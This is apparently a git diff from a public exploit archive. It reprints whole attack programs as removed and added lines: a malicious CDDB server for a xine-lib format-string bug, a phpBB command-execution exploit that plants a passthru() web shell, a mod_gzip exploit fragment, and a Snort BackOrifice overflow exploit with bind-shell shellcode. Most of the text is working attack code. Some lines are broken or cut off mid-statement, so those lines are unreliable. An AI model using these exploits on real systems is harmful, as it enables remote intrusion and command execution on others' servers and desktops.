=~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i) - { - my $docum = <accept() -} - -# milw0rm.com [2005-10-10] +#!/usr/bin/perl -- +# When playing an Audio CD, using xine-lib based media application, +# the library contacts a CDDB server to retrieve metadata like the +# title and artist's name. During processing of this data, a response +# from the server, which is located in memory on the stack, is passed +# to the fprintf() function as a format string. +# An attacker can set up a malicious CDDB server and trick the client +# into using this server instead of the pre-configured one. 
Alternatively, +# any user and therefore the attacker can modify entries in the official +# CDDB server. Using this format string vulnerability, attacker-chosen +# data can be written to an attacker-chosen memory location. This allows +# the attacker to alter the control flow and to execute malicious code with +# the permissions of the user running the application. +# Although it requires the user to play an Audio CD, this vulnerability can +# still be exploited remotely, because a xine Audio CD MRL +# (media resource locator) could be embedded into a website. Added for future ref. /str0ke + +# xine-cddb-server +# by Ulf Harnhammar in 2005 +# I hereby place this program in the public domain. + +use strict; +use IO::Socket; + +$main::port = 8880; +$main::timeout = 5; + + +# *** SUBROUTINES *** + + +sub mysend($$) +{ + my $file = shift; + my $str = shift; + + print $file "$str\n"; + print "SENT: $str\n"; +} # sub mysend + + +sub myreceive($) +{ + my $file = shift; + my $inp; + + eval + { + local $SIG{ALRM} = sub { die "alarm\n" }; + alarm $main::timeout; + $inp = <$file>; + alarm 0; + }; + + if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } + $inp =~ tr/\015\012\000//d; + print "RECEIVED: $inp\n"; + $inp; +} # sub myreceive + + +# *** MAIN PROGRAM *** + + +{ + my $server = IO::Socket::INET->new( Proto => 'tcp', + LocalPort => $main::port, + Listen => SOMAXCONN, + Reuse => 1); + die "can't set up server!\n" unless $server; + + + while (my $client = $server->accept()) + { + $client->autoflush(1); + print 'connection from '.$client->peerhost."\n"; + + + mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '. 
+ scalar localtime); + + while (my $str = myreceive($client)) + { + if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i) + { + mysend($client, "200 Hello and welcome $1\@$2 running $3."); + next; + } + + if ($str =~ m/^proto (\d+)$/i) + { + mysend($client, "201 OK, CDDB protocol level now: $1"); + next; + } + + if ($str =~ m/^cddb query ([0-9a-f]+)/i) + { + mysend($client, "200 rock $1 Exploiters / Formatted and Stringed"); + next; + } + + if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i) + { + my $docum = <accept() +} + +# milw0rm.com [2005-10-10] diff --git a/platforms/linux/remote/1247.pl b/platforms/linux/remote/1247.pl index af41cbae6..2ad436cd4 100755 --- a/platforms/linux/remote/1247.pl +++ b/platforms/linux/remote/1247.pl 
@@ -1,222 +1,222 @@ -#!/usr/bin/perl - -### r57phpbb_admin2exec.pl -### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -### phpBB admin_styles.php commands execution exploit -### tested on phpBB 2.0.13 -### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -### by 1dt.w0lf -### RST/GHC -### http://rst.void.ru -### http://ghc.ru -### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -### screen -### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c get_prefix -### ----------------------------------------------------------------------------------- -### [~] Try to get prefix ...[ DONE ] -### PREFIX : phpbb_ -### ----------------------------------------------------------------------------------- -### -### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -P phpbb_ -### ----------------------------------------------------------------------------------- -### [!] Method 2 - use "create\export style" -### [~] Try to run sql query in database ... [ DONE ] -### [~] Creating new style ... [ DONE ] -### [~] Creating file ... [ DONE ] -### [+] File successfully created! Now you can try execute command! -### [~] Delete style from database ... 
[ DONE ] -### ----------------------------------------------------------------------------------- -### -### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c "uname -sr; id" -### ----------------------------------------------------------------------------------- -### FreeBSD 5.3-RELEASE -### uid=80(www) gid=80(www) groups=80(www) -### ----------------------------------------------------------------------------------- -### 20.04.2005 - -use LWP::UserAgent; -use Getopt::Std; - -getopts("p:s:P:c:m:"); - -$path = $opt_p; -$sid = $opt_s; -$prefix = $opt_P || 'phpbb_'; -$cmd = $opt_c || 'create'; -$method = $opt_m || 2; - -#################### LITTLE CONFIG -# forum on win or unix? commands split by ; or && -$cmdspl = ';'; # unix -# filename for create. default is 'theme_info.cfg' for include in admin_styles.php?mode=addnew -# DONT CHANGE if you don't know that you do!!! -$filename = '/theme_info.cfg'; -# folder for create file, we need folder writable for apache user, by default we use /tmp -$dir = '../../../../../../../../../../../../../../../../../../../../../tmp'; -#################### END CONFIG - -if(!$path || !$sid) { &usage; } - -$xpl = LWP::UserAgent->new() or die; - -if($cmd eq 'clear') - { - &show_header; - print "-----------------------------------------------------------------------------------\n"; - print "[~] Clearing database ... "; - $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="" AND template_name="";'; - $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); - if(!$suc) { print " [ FAILED ]\n"; exit(); } - if($suc == 1) { print " [ DONE ]\n"; } - print "-----------------------------------------------------------------------------------\n"; - exit(); - } - -if($cmd eq 'create' && $method == 1) - { - &show_header; - print "-----------------------------------------------------------------------------------\n"; - print "[!] Method 1 - use \"INTO OUTFILE\"\n"; - print "[!] 
Create file for including.\n"; - print "[~] Try to run sql query in database..."; - $sql = 'SELECT \'\' FROM '.$prefix.'users LIMIT 1 INTO OUTFILE \''.$dir.$filename.'\';'; - $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); - if(!$suc) { print " [ FAILED ]\n"; exit(); } - if($suc == 2) { print " [ DONE ]\n[!] File already exists! Now you can try execute command!\n"; } - if($suc == 1) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } - print "-----------------------------------------------------------------------------------\n"; - exit(); - } - -if($cmd eq 'get_prefix') - { - &show_header; - print "-----------------------------------------------------------------------------------\n"; - print "[~] Try to get prefix ..."; - $res = $xpl->get( - "${path}admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=0&backupstart=1&gzipcompress=0&startdownload=1&sid=$sid" - ); - if($res->is_success && $res->content =~ /(TABLE: )(.*)(auth_access)/) - { - $prefix = ($2)?($2):("No prefix"); - print "[ DONE ]\nPREFIX : $prefix\n"; - } - else { print "[ FAILED ]\n"; } - print "-----------------------------------------------------------------------------------\n"; - exit(0); - } - -if($cmd eq 'create' && $method == 2) - { - &show_header; - print "-----------------------------------------------------------------------------------\n"; - print "[!] 
Method 2 - use \"create\\export style\"\n"; - print "[~] Try to run sql query in database ..."; - $sql = 'ALTER TABLE `'.$prefix.'themes` CHANGE `template_name` `template_name` VARCHAR( 255 ) NOT NULL;'; - $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); - if(!$suc) { print " [ FAILED ]\n"; exit(); } - if($suc == 1) { print " [ DONE ]\n"; } - print "[~] Creating new style ..."; - $res = $xpl->post( - "${path}admin_styles.php?sid=$sid", - [ - 'style_name' => '0wn', - 'template_name' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, - 'mode' => 'create', - 'submit' => 'Save Settings' - ], - ); - if($res->is_success){ print " [ DONE ]\n[~] Creating file ..."; } - else { print " [ FAILED ]\n"; exit(0); } - $res = $xpl->post( - "${path}admin_styles.php?sid=$sid", - [ - 'export_template' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, - 'mode' => 'export', - 'edit' => 'Submit' - ], - ); - if($res->is_success) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } - else { print " [ FAILED ]\n"; exit(0); } - print "[~] Delete style from database ..."; - $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="0wn";'; - &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); - print " [ DONE ]\n"; - print "-----------------------------------------------------------------------------------\n"; - exit(0); - } - -$jagajaga = 'echo _GHC/RST_ '; -$jagajaga .= $cmdspl; -$jagajaga .= $cmd; -$jagajaga .= $cmdspl; -$jagajaga .= ' echo _GHC/RST_'; - -$res = $xpl->post( - "${path}admin_styles.php?mode=addnew&sid=${sid}&install_to=${dir}", - [ - 'jagajaga' => "$jagajaga" - ] - ); - -&show_header; - -if($res->content =~ /main\(\): Failed opening/) { print "[-] Error!\nFailed include file! 
Maybe you forgot create shell file first?\n"; exit(); } - -@rez = split("_GHC/RST_",$res->content); -print "-----------------------------------------------------------------------------------\n"; -print @rez[1]; -print "-----------------------------------------------------------------------------------\n"; - -sub usage(){ - print "-----------------------------------------------------------------------------------\n"; - print " phpBB admin_styles.php command execution exploit by 1dt.w0lf\n"; - print "-----------------------------------------------------------------------------------\n"; - print "Usage: $0 [options]\n"; - print "\nOptions:\n\n"; - print " -p path to phpBB admin interface e.g. http://site.com/phpBB/admin/\n\n"; - print " -s admin sid ... yeeesss you need admin rights for use this exploit =)\n\n"; - print " -P database prefix (optional) default \"phpbb_\"\n\n"; - print " -c [create|clear|get_prefix|(any unix/win command)]\n\n"; - print " \"create\" for first create shell *default\n"; - print " \"clear\" for delete our NULL styles from database\n"; - print " \"get_prefix\" get table prefix\n"; - print " \"any unix or win commands\" for commands execute =)\n\n"; - print " -m method [1|2] (optional) default \"2\"\n\n"; - print " 1 - use mysql function \"INTO OUTFILE\" for creating new file\n"; - print " 2 - use phpBB functions \"create style\" and \"export style\" for create new file\n"; - print "-----------------------------------------------------------------------------------\n"; - print " RST/GHC private stuff , http://rst.void.ru , http://ghc.ru\n"; - exit(); -} - -sub show_header() -{ -print "-----------------------------------------------------------------------------------\n"; -print " phpBB admin_styles.php command execution exploit by RST/GHC\n"; -print "-----------------------------------------------------------------------------------\n"; -} - -sub phpbb_sql_query($$){ -$res = $xpl->post("$_[0]", -Content_type => 'form-data', -Content => [ - 
perform => 'restore', - restore_start => 'Start Restore', - backup_file => [ - undef, - '0wneeeeedddd', - Content_type => 'text/plain', - Content => "$_[1]", - ], - ] -); -if ($res->is_success) - { - if ($res->content =~ /already exists/) { return 2; } - if ($res->content =~ /The Database has been successfully restored/) { return 1; } - } -return 0; -} - -# milw0rm.com [2005-10-11] +#!/usr/bin/perl + +### r57phpbb_admin2exec.pl +### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +### phpBB admin_styles.php commands execution exploit +### tested on phpBB 2.0.13 +### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +### by 1dt.w0lf +### RST/GHC +### http://rst.void.ru +### http://ghc.ru +### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +### screen +### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c get_prefix +### ----------------------------------------------------------------------------------- +### [~] Try to get prefix ...[ DONE ] +### PREFIX : phpbb_ +### ----------------------------------------------------------------------------------- +### +### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -P phpbb_ +### ----------------------------------------------------------------------------------- +### [!] Method 2 - use "create\export style" +### [~] Try to run sql query in database ... [ DONE ] +### [~] Creating new style ... [ DONE ] +### [~] Creating file ... [ DONE ] +### [+] File successfully created! Now you can try execute command! +### [~] Delete style from database ... 
[ DONE ] +### ----------------------------------------------------------------------------------- +### +### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c "uname -sr; id" +### ----------------------------------------------------------------------------------- +### FreeBSD 5.3-RELEASE +### uid=80(www) gid=80(www) groups=80(www) +### ----------------------------------------------------------------------------------- +### 20.04.2005 + +use LWP::UserAgent; +use Getopt::Std; + +getopts("p:s:P:c:m:"); + +$path = $opt_p; +$sid = $opt_s; +$prefix = $opt_P || 'phpbb_'; +$cmd = $opt_c || 'create'; +$method = $opt_m || 2; + +#################### LITTLE CONFIG +# forum on win or unix? commands split by ; or && +$cmdspl = ';'; # unix +# filename for create. default is 'theme_info.cfg' for include in admin_styles.php?mode=addnew +# DONT CHANGE if you don't know that you do!!! +$filename = '/theme_info.cfg'; +# folder for create file, we need folder writable for apache user, by default we use /tmp +$dir = '../../../../../../../../../../../../../../../../../../../../../tmp'; +#################### END CONFIG + +if(!$path || !$sid) { &usage; } + +$xpl = LWP::UserAgent->new() or die; + +if($cmd eq 'clear') + { + &show_header; + print "-----------------------------------------------------------------------------------\n"; + print "[~] Clearing database ... "; + $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="" AND template_name="";'; + $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); + if(!$suc) { print " [ FAILED ]\n"; exit(); } + if($suc == 1) { print " [ DONE ]\n"; } + print "-----------------------------------------------------------------------------------\n"; + exit(); + } + +if($cmd eq 'create' && $method == 1) + { + &show_header; + print "-----------------------------------------------------------------------------------\n"; + print "[!] Method 1 - use \"INTO OUTFILE\"\n"; + print "[!] 
Create file for including.\n"; + print "[~] Try to run sql query in database..."; + $sql = 'SELECT \'\' FROM '.$prefix.'users LIMIT 1 INTO OUTFILE \''.$dir.$filename.'\';'; + $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); + if(!$suc) { print " [ FAILED ]\n"; exit(); } + if($suc == 2) { print " [ DONE ]\n[!] File already exists! Now you can try execute command!\n"; } + if($suc == 1) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } + print "-----------------------------------------------------------------------------------\n"; + exit(); + } + +if($cmd eq 'get_prefix') + { + &show_header; + print "-----------------------------------------------------------------------------------\n"; + print "[~] Try to get prefix ..."; + $res = $xpl->get( + "${path}admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=0&backupstart=1&gzipcompress=0&startdownload=1&sid=$sid" + ); + if($res->is_success && $res->content =~ /(TABLE: )(.*)(auth_access)/) + { + $prefix = ($2)?($2):("No prefix"); + print "[ DONE ]\nPREFIX : $prefix\n"; + } + else { print "[ FAILED ]\n"; } + print "-----------------------------------------------------------------------------------\n"; + exit(0); + } + +if($cmd eq 'create' && $method == 2) + { + &show_header; + print "-----------------------------------------------------------------------------------\n"; + print "[!] 
Method 2 - use \"create\\export style\"\n"; + print "[~] Try to run sql query in database ..."; + $sql = 'ALTER TABLE `'.$prefix.'themes` CHANGE `template_name` `template_name` VARCHAR( 255 ) NOT NULL;'; + $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); + if(!$suc) { print " [ FAILED ]\n"; exit(); } + if($suc == 1) { print " [ DONE ]\n"; } + print "[~] Creating new style ..."; + $res = $xpl->post( + "${path}admin_styles.php?sid=$sid", + [ + 'style_name' => '0wn', + 'template_name' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, + 'mode' => 'create', + 'submit' => 'Save Settings' + ], + ); + if($res->is_success){ print " [ DONE ]\n[~] Creating file ..."; } + else { print " [ FAILED ]\n"; exit(0); } + $res = $xpl->post( + "${path}admin_styles.php?sid=$sid", + [ + 'export_template' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, + 'mode' => 'export', + 'edit' => 'Submit' + ], + ); + if($res->is_success) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } + else { print " [ FAILED ]\n"; exit(0); } + print "[~] Delete style from database ..."; + $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="0wn";'; + &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); + print " [ DONE ]\n"; + print "-----------------------------------------------------------------------------------\n"; + exit(0); + } + +$jagajaga = 'echo _GHC/RST_ '; +$jagajaga .= $cmdspl; +$jagajaga .= $cmd; +$jagajaga .= $cmdspl; +$jagajaga .= ' echo _GHC/RST_'; + +$res = $xpl->post( + "${path}admin_styles.php?mode=addnew&sid=${sid}&install_to=${dir}", + [ + 'jagajaga' => "$jagajaga" + ] + ); + +&show_header; + +if($res->content =~ /main\(\): Failed opening/) { print "[-] Error!\nFailed include file! 
Maybe you forgot create shell file first?\n"; exit(); } + +@rez = split("_GHC/RST_",$res->content); +print "-----------------------------------------------------------------------------------\n"; +print @rez[1]; +print "-----------------------------------------------------------------------------------\n"; + +sub usage(){ + print "-----------------------------------------------------------------------------------\n"; + print " phpBB admin_styles.php command execution exploit by 1dt.w0lf\n"; + print "-----------------------------------------------------------------------------------\n"; + print "Usage: $0 [options]\n"; + print "\nOptions:\n\n"; + print " -p path to phpBB admin interface e.g. http://site.com/phpBB/admin/\n\n"; + print " -s admin sid ... yeeesss you need admin rights for use this exploit =)\n\n"; + print " -P database prefix (optional) default \"phpbb_\"\n\n"; + print " -c [create|clear|get_prefix|(any unix/win command)]\n\n"; + print " \"create\" for first create shell *default\n"; + print " \"clear\" for delete our NULL styles from database\n"; + print " \"get_prefix\" get table prefix\n"; + print " \"any unix or win commands\" for commands execute =)\n\n"; + print " -m method [1|2] (optional) default \"2\"\n\n"; + print " 1 - use mysql function \"INTO OUTFILE\" for creating new file\n"; + print " 2 - use phpBB functions \"create style\" and \"export style\" for create new file\n"; + print "-----------------------------------------------------------------------------------\n"; + print " RST/GHC private stuff , http://rst.void.ru , http://ghc.ru\n"; + exit(); +} + +sub show_header() +{ +print "-----------------------------------------------------------------------------------\n"; +print " phpBB admin_styles.php command execution exploit by RST/GHC\n"; +print "-----------------------------------------------------------------------------------\n"; +} + +sub phpbb_sql_query($$){ +$res = $xpl->post("$_[0]", +Content_type => 'form-data', +Content => [ + 
perform => 'restore', + restore_start => 'Start Restore', + backup_file => [ + undef, + '0wneeeeedddd', + Content_type => 'text/plain', + Content => "$_[1]", + ], + ] +); +if ($res->is_success) + { + if ($res->content =~ /already exists/) { return 2; } + if ($res->content =~ /The Database has been successfully restored/) { return 1; } + } +return 0; +} + +# milw0rm.com [2005-10-11] diff --git a/platforms/linux/remote/126.c b/platforms/linux/remote/126.c index 9842f07a4..9f1ad55bd 100755 --- a/platforms/linux/remote/126.c +++ b/platforms/linux/remote/126.c @@ -267,6 +267,6 @@ printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [ return 0; -} - -// milw0rm.com [2003-11-20] +} + +// milw0rm.com [2003-11-20] diff --git a/platforms/linux/remote/1272.c b/platforms/linux/remote/1272.c index 255118764..246ecd0b1 100755 --- a/platforms/linux/remote/1272.c +++ b/platforms/linux/remote/1272.c 
@@ -1,419 +1,419 @@ -/* - * THCsnortbo 0.3 - Snort BackOrifice PING exploit - * by rd@thc.org - * THC PUBLIC SOURCE MATERIALS - * - * Bug was found by Internet Security Systems - * http://xforce.iss.net/xforce/alerts/id/207 - * - * v0.3 - removed/cleaned up info for public release - * v0.2 - details added, minor changes - * v0.1 - first release - * - * Greetz to all guests at THC's 10th - * Anniversary (TAX) :> - * - * $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $ - * - */ - -/* - * DETAILS - * - * The bug is in spp_bo.c, BoGetDirection() function - * static int BoGetDirection(Packet *p, char *pkt_data) { - * u_int32_t len = 0; - * u_int32_t id = 0; - * u_int32_t l, i; - * char type; - * char buf1[1024]; - * - * ... - * buf_ptr = buf1; - * ... - * while ( i < len ) { - * plaintext = (char) (*pkt_data ^ (BoRand()%256)); - * *buf_ptr = plaintext; - * i++; - * pkt_data++; - * buf_ptr++; - * - * len is taken from the BO packet header, so its a buffer - * overflow when len > buf1 size. - * - * The exchange of data between the BO client and server is - * done using encrypted UDP packets - * - * BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html) - * Mnemonic Size in bytes - * MAGIC 8 - * LEN 4 - * ID 4 - * T 1 - * DATA variable - * CRC 1 - * - * On x86, because of the stack layout, we end up overwriting - * the loop counter (i and len). To solve this problem, we - * can set back the approriate value for i and len. We can - * also able to set a NULL byte to stop the loop. - * - * There is no chance for bruteforce, snort will die after the - * first bad try. On Linux system with kernel 2.6 with VA - * randomized, it would be much harder for a reliable exploit. - * - * - * In case of _non-optimized_ compiled snort binary, the stack - * would looks like this: - * - * [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data] - * - * The exploit could be reliable in this case, by using a - * pop/ret return addess. 
Lets send to snort a UDP packet - * as the following: - * - * [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][ shellcode ] - * [ Encrypted ][ Non Encrypted ] - * - * When the overwriting loop stop, pkt_data will point to - * the memory after return address (NOP part) in raw packet - * data. So, using a return address that points to POP/RET - * instructions would be enough for a reliable exploit. - * (objdump -d binary|grep -B1 ret|grep -A1 pop to find one) - * - * This method will work well under linux kernel 2.6 with VA - * randomized also. - * - * In case of optimized binary, it would be harder since - * the counter i, len and buffer pointers could/possibly be - * registered variables. And the register points to buffer - * get poped from stack when the funtion return. In this case, - * the return address should be hard-coded but it would be - * unreliable (especially on linux kernel 2.6 with VA - * randomization patch). - * - * This exploit would generally work. Providing that you know - * how to find and use correct offsets and return address :> - * - * - * Example: - * - * $ ./THCsnortbo - * Snort BackOrifice PING exploit (version 0.3) - * by rd@thc.org - * - * Usage: ./THCsnortbo host target - * - * Available Targets: - * 1 | manual testing gcc with -O0 - * 2 | manual testing gcc with -O2 - * - * $ ./snortbo 192.168.0.101 1 - * Snort BackOrifice PING exploit (version 0.3) - * by rd@thc.org - * - * Selected target: - * 1 | manual testing gcc with -O0 - * - * Sending exploit to 192.168.0.101 - * Done. 
- * - * $ nc 192.168.0.101 31337 - * id - * uid=104(snort) gid=409(snort) groups=409(snort) - * uname -sr - * Linux 2.6.11-hardened-r1 - * - */ - -#include -#include -#include -#include -#include -#include -#include -#ifdef HAVE_UNISTD_H -#include -#endif -#ifdef HAVE_SYS_TIME_H -#include -#endif -#ifdef HAVE_SYS_SELECT_H -#include -#endif -#ifdef HAVE_STRINGS_H -#include -#endif -#ifdef HAVE_MALLOC_H -#include -#endif -#include -#include -#include - -#define VERSION "0.3" - -/* shellcodes */ - -/* a quick test bind shellcode on port 31337 from metasploit - * - * Connect back shellcode for snort exploit should be better, do - * it by yourself. im lazy :> - */ -unsigned char x86_lnx_bind[] = -"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" -"\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" -"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" -"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" -"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" -"\x89\xe1\xcd\x80"; - -typedef struct { - char *desc; // description - unsigned char *scode; // shellcode - unsigned int scode_len; - unsigned long retaddr; // return address - unsigned int i_var_off; // offset from buf1 to variable 'i' - unsigned int len_var_off; // offset from buf1 to variable 'len' - unsigned int ret_off; // offset from buf1 to saved eip - unsigned int datasize; // value of size field in BO ping packet -} t_target; - -t_target targets[] = { - { - "manual testing gcc with -O0", - x86_lnx_bind, sizeof(x86_lnx_bind), - //0x0804aa07, - 0x4008f000+0x16143, // pop/ret in libc - 1024+1+32, 1024+1+44, 1024+1+60, - 0xFFFFFFFF - }, - { - "manual testing gcc with -O2", - x86_lnx_bind, sizeof(x86_lnx_bind), - 0x0804aa07, //0xbfffe9e0 - 1024+1+8, 1024+1+20, 1024+1+44, - 1048+4+24 - }, - { NULL, NULL, 0, 0, 0, 0, 0, 0 } -}; - -#define PACKETSIZE 1400 -#define OVERFLOW_BUFFSZ 1024 -#define IVAL 0x11223344; -#define LVAL 0x11223354+16; - 
-#define ARGSIZE 256 -#define PORT 53 -#define MAGICSTRING "*!*QWTY?" -#define MAGICSTRINGLEN 8 -#define TYPE_PING 0x01 - -static long holdrand = 1L; -char g_password[ARGSIZE]; -int port = PORT; - -/* - * borrowed some code from BO client - */ -void msrand (unsigned int seed ) -{ - holdrand = (long)seed; -} - -int mrand ( void) -{ - return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff); -} - -unsigned int getkey() -{ - int x, y; - unsigned int z; - - y = strlen(g_password); - if (!y) - return 31337; - else { - z = 0; - for (x = 0; x < y; x++) - z+= g_password[x]; - - for (x = 0; x < y; x++) { - if (x%2) - z-= g_password[x] * (y-x+1); - else - z+= g_password[x] * (y-x+1); - z = z%RAND_MAX; - } - - z = (z * y)%RAND_MAX; - return z; - } -} - -void BOcrypt(unsigned char *buff, int len) -{ - int y; - - if (!len) - return; - - msrand(getkey()); - for (y = 0; y < len; y++) - buff[y] = buff[y] ^ (mrand()%256); -} - -void explbuild(unsigned char *buff, t_target *t) -{ - unsigned char *ptr; - unsigned long *pdw; - unsigned long size; - unsigned char *scode; - unsigned int scode_len; - unsigned long retaddr; - unsigned int i_var_off; - unsigned int len_var_off; - unsigned int ret_off; - unsigned int datasize; - - scode = t->scode; - scode_len = t->scode_len; - retaddr = t->retaddr; - i_var_off = t->i_var_off; - len_var_off = t->len_var_off; - ret_off = t->ret_off; - datasize = t->datasize; - - memset(buff, 0x90, PACKETSIZE); - buff[PACKETSIZE - 1] = 0; - - strcpy(buff, MAGICSTRING); - - pdw = (unsigned long *)(buff + MAGICSTRINGLEN); - *pdw++ = datasize; - *pdw++ = (unsigned long)-1; - ptr = (unsigned char *)pdw; - *ptr++ = TYPE_PING; - - size = IVAL; - memcpy(buff + i_var_off, &size, 4); - size = LVAL; - memcpy(buff + len_var_off, &size, 4); - - memcpy(buff + ret_off, &retaddr, 4); - - /* you may want to place shellcode on encrypted part and will - * be decrypted into buf1 by BoGetDirection - */ - // memcpy(buff + OVERFLOW_BUFFSZ - scode_len - 128, - // (char 
*) scode, scode_len); - - memcpy(buff + PACKETSIZE - scode_len - 1, (char *)scode, scode_len); - - /* you may want to set NULL byte to stop the loop here, but it - * won't work with pop/ret method - */ - // buff[ret_off + 4] = 0; - - size = ret_off + 4; - BOcrypt(buff, (int)size); -} - -int sendping(unsigned long dest, int port, int sock, unsigned char *buff) -{ - struct sockaddr_in host; - int i, size; - fd_set fdset; - struct timeval tv; - - size=PACKETSIZE; - host.sin_family = AF_INET; - host.sin_port = htons((u_short)port); - host.sin_addr.s_addr = dest; - - FD_ZERO(&fdset); - FD_SET(sock, &fdset); - tv.tv_sec = 10; - tv.tv_usec = 0; - - i = select(sock+1, NULL, &fdset, NULL, &tv); - if (i == 0) { - printf("Timeout\n"); - return(1); - } else if (i < 0) { - perror("select: "); - return(1); - } - - if ( (sendto(sock, buff, size, 0, - (struct sockaddr *)&host, sizeof(host))) != size ) { - perror("sendto: "); - return(1); - } - - return 0; -} - -void usage(char *prog) -{ - int n; - - printf("Usage: %s host target\n\nAvailable Targets:\n", prog); - - for (n = 0 ; targets[n].desc != NULL ; n++) - printf ("%3d | %s\n", n + 1, targets[n].desc); - printf (" \n"); -} - - -int main(int argc, char **argv) -{ - struct in_addr hostin; - unsigned long dest; - char buff[PACKETSIZE]; - int ntarget; - - printf("Snort BackOrifice PING exploit (version "VERSION")\n" - "by rd@thc.org\n\n"); - - if (argc < 3 || ((ntarget = atoi(argv[2])) <= 0) ) { - usage(argv[0]); - return 0; - } - - if (ntarget >= (sizeof(targets) / sizeof(t_target))) { - printf ("WARNING: target out of list. list:\n\n"); - usage(argv[0]); - return 0; - } - - ntarget = ntarget - 1; - - // change the key here to avoid the detection of a simple - // packet matching IDS signature. 
- g_password[0] = 0; - - if ( (dest = inet_addr(argv[1])) == (unsigned long)-1) - printf("Bad IP: '%s'\n", argv[1]); - else { - int s; - hostin.s_addr = dest; - s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP); - - printf("Selected target:\n%3d | %s\n", ntarget+1, - targets[ntarget].desc); - explbuild(buff, &targets[ntarget]); - - printf("\nSending exploit to %s\n", inet_ntoa(hostin)); - if (sendping(dest, port, s, buff)) - printf("Sending exploit failed for dest %s\n", - inet_ntoa(hostin)); - printf("Done.\n"); - } - - return 0; -} - -// milw0rm.com [2005-10-25] +/* + * THCsnortbo 0.3 - Snort BackOrifice PING exploit + * by rd@thc.org + * THC PUBLIC SOURCE MATERIALS + * + * Bug was found by Internet Security Systems + * http://xforce.iss.net/xforce/alerts/id/207 + * + * v0.3 - removed/cleaned up info for public release + * v0.2 - details added, minor changes + * v0.1 - first release + * + * Greetz to all guests at THC's 10th + * Anniversary (TAX) :> + * + * $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $ + * + */ + +/* + * DETAILS + * + * The bug is in spp_bo.c, BoGetDirection() function + * static int BoGetDirection(Packet *p, char *pkt_data) { + * u_int32_t len = 0; + * u_int32_t id = 0; + * u_int32_t l, i; + * char type; + * char buf1[1024]; + * + * ... + * buf_ptr = buf1; + * ... + * while ( i < len ) { + * plaintext = (char) (*pkt_data ^ (BoRand()%256)); + * *buf_ptr = plaintext; + * i++; + * pkt_data++; + * buf_ptr++; + * + * len is taken from the BO packet header, so its a buffer + * overflow when len > buf1 size. + * + * The exchange of data between the BO client and server is + * done using encrypted UDP packets + * + * 